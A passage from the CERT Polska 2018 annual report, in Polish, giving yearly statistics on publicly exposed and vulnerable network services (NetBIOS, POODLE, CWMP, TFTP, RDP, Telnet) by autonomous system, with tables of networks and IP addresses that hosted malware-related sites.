9 21021 Multimedia 363 723 0,05%

10 57101 WP System 302 359 5,61%

Tabela 21. Liczba adresów IP, na których wykryto działającą usługę SSDP dostępną na publicznym interfejsie w podziale na systemy autonomiczne.


NetBIOS

NetBIOS to niskopoziomowy protokół wykorzystywany przede wszystkim przez systemy Microsoft. Powinien być używany wyłącznie w sieciach lokalnych, a jeśli jest dostępny z sieci publicznej, sta-nowi zagrożenie - nie tylko w związku z możliwością wykorzystania w atakach DDoS. Otrzymaliśmy 6 099 021 zgłoszeń o 98 920 unikalnych adresach IP (spadek o ok. 40 tys.), dzienna średnia wynio-sła 17 909.

W roku 2018 obserwowaliśmy stopniowy spadek liczby adresów IP z uruchomionym NetBIOS-em. Jedyną anomalią jest pik obserwowany również w 2017 roku, tym razem około 26 lutego. Pochodził on jednak wyłącznie z sieci Orange (AS 5617).


Odsetek wszystkich

adresów w AS

1 5617 Orange 11 127 29 045 0,20%

2 12741 Netia 1 091 1 406 0,06%

3 9143 Ziggo 967 1 023 0,02%

4 49185 Protonet 781 1 417 3,14%

5 198414 H88 465 876 4,90%

6 16276 OVH 241 357 0,01%

7 8267 Cyfronet AGH 172 233 0,22%

8 12824 Home.pl 157 202 0,07%

9 8374 Plus 135 169 0,01%

10 13110 INEA 119 150 0,07%

Tabela 22. Liczba adresów IP, na których wykryto działającą usługę NetBIOS dostępną na publicznym interfejsie w podziale na systemy autonomiczne.


Podatneusługi

W tej sekcji przedstawiamy statystyki dotyczące usług, które są narażone na ataki oraz wycieki infor-macji. Są to zarówno usługi, które zawierają znane podatności, jak i usługi źle skonfigurowane, na przykład niepotrzebnie dostępne z internetu lub dostępne bez hasła.

W roku 2018 otrzymaliśmy 162 792 811 zgłoszeń dotyczących 2 649 502 unikalnych polskich adre-sów IP. Na kolejnych stronach przedstawiamy szczegółowe informacje dla najliczniejszych zagrożeń tego rodzaju. Przedstawione statystyki zostały obliczone analogicznie jak w podrozdziale dotyczą-cym usług pozwalających na prowadzenie ataków DRDoS (por. str. 111).

W rankingu najczęściej występujących podatnych usług wysoko znajdują się TFTP, Telnet i RDP. Tego rodzaju usługi najczęściej zabezpieczane są poprzez ograniczanie dostępu z zewnętrznych adresów, dlatego publiczna dostępność usługi może wskazywać na błąd konfiguracji i potencjalną podatność. Natomiast samo zgłoszenie publicznej dostępności usługi nie znaczy jeszcze, że jest ona podatna. Na przykład RDP może mieć ustawione silne hasło, stanowiące wystarczające zabez-pieczenie przed nieuprawnionym dostępem - o ile nie zostanie wykryta nowa podatność w aplikacji, która pozwoli obejść uwierzytelnienie.

Podobne rozumowanie trudniej zastosować do baz danych lub podobnych aplikacji (Memcached, MongoDB, Elasticsearch, Redis, DB2). W ich przypadku dostęp publiczny jest niemal na pewno wynikiem błędnej konfiguracji i należy taką sytuację traktować jako podatność.

Nazwa podatności

Średnia dzienna liczba IP

Maksimum dzienne

Odchylenie standardowe

Czas obserwacji

SSL-POODLE 255 546 312 044 64 918 89,04%

CWMP 62 332 75 744 13 744 93,15%

TFTP 48 648 59 758 10 648 93,42%

RDP 36 180 43 847 8 532 93,70%

Telnet 31 512 41 663 8 271 94,52%

NAT-PMP 10 859 15 628 2 942 91,78%

ISAKMP 10 156 11 758 2 011 88,77%

SSL-FREAK 9 701 13 885 3 649 92,88%

VNC 8 683 11 478 1 616 90,96%

SMB 8 324 11 725 1 834 93,70%

IPMI 1 388 1 602 212 92,88%

LDAP 480 921 126 92,60%

MongoDB 404 499 74 92,60%

Memcached 286 667 139 93,42%

Elasticsearch 86 107 12 93,42%

Redis 73 101 17 92,60%

Tabela 23. Zestawienie najliczniej występujących w Polsce zagrożonych usług. Odchylenie standardowe dotyczy zmienności w dziennej liczbie adresów IP obserwowanych na przestrzeni roku. Łączny czas obserwacji odpowiada liczbie dni w ciągu roku, dla których mieliśmy informacje o danej usłudze.


POODLE

Znane podatności protokołu SSL/TLS są nadal powszechnym zjawiskiem wśród użytkowników pol-skiego internetu. Zdecydowanie najczęściej występującą jest POODLE, która umożliwia atak dopro-wadzający do ujawnienia zaszyfrowanych informacji.

Otrzymaliśmy 84 120 432 zgłoszenia o 977 498 unikalnych adresach IP (spadek o 155 tys. wobec 2017 r.), a dzienna średnia wyniosła 255 546 unikalnych adresów. Podobnie jak w poprzednich latach, pierwsze dwa miejsca zajmują sieci Netia (AS 12741) oraz Internetia (AS 43939). Wśród 10 sieci z największą średnią liczbą serwerów podatnych na POODLE zwraca również uwagę sieć Petrotel z niemal 20 proc. odsetkiem adresów. Dobrym trendem jest spadek liczby usług w sieci H88 (AS 198414) z około 1200 adresów na początku roku do około 500 adresów na końcu roku.

Mimo powszechnego występowania, POODLE nie jest podatnością najwyższego ryzyka, ponieważ nie umożliwia kradzieży kluczy kryptograficznych, ani bezpośrednio przejęcia kontroli nad serwe-rem, a także wymaga aktywnego przechwycenia sesji TCP (atak typu man-in-the-middle).


Odsetek wszystkich

adresów w AS

1 12741 Netia 185 251 228 509 11,26%

2 43939 Internetia 28 539 33 949 10,80%

3 5617 Orange 8 149 10 247 0,14%

4 29007 Petrotel 3 160 3 762 19,28%

5 16276 OVH 1 561 2 337 0,05%

6 6830 UPC 1 083 1 351 0,01%

7 15694 ATMAN 736 892 0,94%

8 198414 H88 723 1 325 7,63%

9 21021 Multimedia 655 857 0,10%

10 29314 Vectra 591 783 0,11%

Tabela 24. Liczba adresów IP, na których wykryto usługę SSL z podatnością POODLE w podziale na systemy autonomiczne.


CWMP

CWMP to usługa oparta na specyfikacji TR-069, implementowana najczęściej w domowych route-rach DSL. Umożliwia zdalne zarządzanie urządzeniem przez operatorów, np. aktualizację firmware. Niepoprawna implementacja tej usługi pozwala na przejęcie całkowitej kontroli nad urządzeniem przez atakującego. Podatność tę wykorzystuje m.in. Mirai, infekując kolejne urządzenia.

Otrzymaliśmy 21 268 845 zgłoszeń o 1 868 687 unikalnych adresach IP z dostępnym publicznie CWMP (spadek o około 160 tys. w porównaniu do 2017 r.). Dzienna średnia unikalnych adresów wy-niosła 62 332. Zauważalne są istotne spadki (o ponad połowę) w sieciach T-Mobile (AS 12912) oraz Multimedia (AS 21021), zwraca jednak uwagę duży odsetek sieci w Agencji Rozwoju Regionalnego (AS 41023).


Odsetek wszystkich

adresów w AS

1 5617 Orange 42 880 52 915 0,77%

2 12741 Netia 11 414 14 063 0,69%

3 12912 T-Mobile 1 349 2 297 0,19%

4 49185 Protonet 732 1 462 2,94%

5 21021 Multimedia 670 1 054 0,11%

6 41023 Agencja Rozwoju Regionalnego 635 753 17,71%

7 43679 Petrus 350 587 3,41%

8 50231 Syrion 334 781 3,34%

9 51337 Debacom 296 359 4,81%

10 50606 Virtuaoperator 294 364 1,95%

Tabela 25. Liczba adresów IP, na których wykryto usługę CWMP dostępną na publicznym interfejsie w podziale na systemy autonomiczne.


TFTP

TFTP (Trivial File Transfer Protocol) jest prostym protokołem transferu plików. Ze względu na brak mechanizmu uwierzytelniania użytkowników, nie zalecamy udostępniania tej usługi w sieci internet, ponieważ może to prowadzić do wycieku informacji.

W 2018 r. otrzymaliśmy 16 648 837 zgłoszeń o 413 402 unikalnych adresach IP (spadek o ok. 24 proc.) z dostępnym z internetu TFTP. W trakcie roku obserwowaliśmy stopniowy spadek liczebności usługi w sieci Orange (z ok. 50 tys. do 35 tys.) oraz Protonet (o ponad połowę, AS 49185). Niepokoi wysoki odsetek sieci Spółdzielni Mieszkaniowej „Północ” (AS 198000).


Odsetek wszystkich

adresów w AS

1 5617 Orange 38 303 49 029 0,69%

2 9143 Ziggo 4 835 5 086 0,13%

3 198000 Spółdzielnia Mieszkaniowa "Północ" 1 484 1 739 16,10%

4 49185 Protonet 1 228 1 915 4,94%

5 12741 Netia 1 192 1 466 0,07%

6 21021 Multimedia 532 626 0,08%

7 50231 Syrion 327 784 3,27%

8 199201 SPI-NET 262 506 8,52%

9 200125 AVITO 141 181 4,58%

10 198766 Netsystem 136 178 3,13%

Tabela 26. Liczba adresów IP, na których wykryto usługę TFTP dostępną na publicznym interfejsie w podziale na systemy auto-nomiczne.


RDP

Protokół RDP (Remote Desktop Protocol) jest własnościowym protokołem stworzonym przez Micro-soft, służącym do zdalnego dostępu do środowisk graficznych w systemach Windows. Pomimo wy-gody dostępu do systemów, ekspozycja portu 3389 na interfejsach zewnętrznych jest niezalecana. W 2018 r. otrzymaliśmy 12 758 217 zgłoszeń o 544 621 unikalnych adresach IP, na których wykryto usługę RDP dostępną na publicznym interfejsie.


Odsetek wszystkich

adresów w AS

1 5617 Orange 15 218 19 564 0,27%

2 12741 Netia 2 956 3 741 0,17%

3 16276 OVH 1 295 1 712 0,04%

4 9143 Ziggo 1 232 1 587 0,03%

5 6830 UPC 1 153 1 347 0,01%

6 57129 Optibit 699 1 004 0,52%

7 8374 Plus 633 753 0,04%

8 21021 Multimedia 483 587 0,07%

9 13110 INEA 465 564 0,27%

10 12912 T-Mobile 405 484 0,06%

Tabela 27. Liczba adresów IP, na których wykryto usługę RDP dostępną na publicznym interfejsie w podziale na systemy autono-miczne.


Telnet

Telnet jest przestarzałym protokołem komunikacyjnym do obsługi zdalnego terminala, poprzedni-kiem współczesnego SSH. Jego największą słabością jest całkowity brak szyfrowania, dlatego nie należy go używać, zwłaszcza w sieciach publicznych. W roku 2018 zebraliśmy 10 942 498 zgłoszeń dotyczących 611 179 unikalnych adresów IP (spadek z 784 999 w porównaniu do 2017 r.). Pozy-tywnym trendem w ujęciu rocznym jest spadek hostów z otwartą usługą Telnet w sieciach Exatel (AS 20804) oraz TK Telekom (AS 20960) o około połowę.


Odsetek wszystkich

adresów w AS

1 5617 Orange 6 860 8 830 0,12%

2 12741 Netia 6 247 8 125 0,37%

3 9143 Ziggo 1 049 1 436 0,02%

4 21021 Multimedia 595 778 0,09%

5 8374 Polkomtel 551 675 0,04%

6 6830 UPC 500 644 0,00%

7 20960 TK Telekom 469 738 0,18%

8 35191 ASTA-NET 424 511 0,72%

9 20804 Exatel 404 657 0,16%

10 43939 Internetia 349 439 0,13%

Tabela 28. Liczba adresów IP, na których wykryto usługę Telnet dostępną na publicznym interfejsie w podziale na systemy autonomiczne.


Złośliwestrony

W ubiegłym roku zebraliśmy informacje o 4 457 213 unikalnych adresach URL związanych z działal-nością szkodliwego oprogramowania, z czego 93 266 adresów było w domenie .pl. 30 456 złośliwych adresów URL rozwiązywało się na polskie adresy IP. Najpopularniejsze systemy autonomiczne, w których znajdowały się te adresy IP przedstawiono w tabeli 30.

Najpopularniejszymi domenami wśród złośliwych adresów URL z podziałem na domenę drugiego poziomu były: chomikuj.pl (66 861 wystąpień) oraz com.pl (2 144).

Poz. Liczba domen .pl Adres IP ASN Nazwa

1 100 217.97.216.17 5617 Orange

2 82 144.76.61.239 24940 Hetzner

3 81 91.102.114.204 31229 E24

4 71 95.211.144.65 60781 LeaseWeb

5 51 37.59.49.187 16276 OVH

6 48 85.128.128.99 15967 Nazwa.pl

7 43 87.98.239.19 16276 OVH

8 41 195.114.0.64 41079 H88

9 38 193.203.99.114 47303 Redefine

10 37 193.109.246.54 29076 CityTelecom

Tabela 29. Adresy IP, na których utrzymywano najwięcej domen .pl związanych ze złośliwym oprogramowaniem.


Poz. Liczba IP ASN Nazwa Procent sieci Udział

1 1.010 12824 home.pl 0,49% 30,07%

2 520 15967 Nazwa.pl 0,53% 15,48%

3 225 16276 OVH 0,01% 6,70%

4 134 41079 H88 1,80% 3,99%

5 114 29522 KEI 0,17% 3,39%

6 75 197226 SPRINT 0,49% 2,23%

7 53 205727 Aruba 0,43% 1,58%

8 50 57367 ATM 0,32% 1,49%

8 50 198414 H88 0,48% 1,49%

8 50 15694 ATM 0,06% 1,49%

11 48 8308 NASK 0,02% 1,43%

12 44 5617 Orange 0,00% 1,31%

Tabela 30. Systemy autonomiczne, gdzie utrzymywano najwięcej złośliwych stron.

NASK/CERT Polskaul. Kolska 12, 01-045 Warszawatel. +48 22 38 08 274fax +48 22 38 08 399mail: [email protected]

Zeskanuj kod i odwiedźnaszą stronę internetową

Raport roczny 2018 - CERT Polska

Documents

Transcript of Raport roczny 2018 - CERT Polska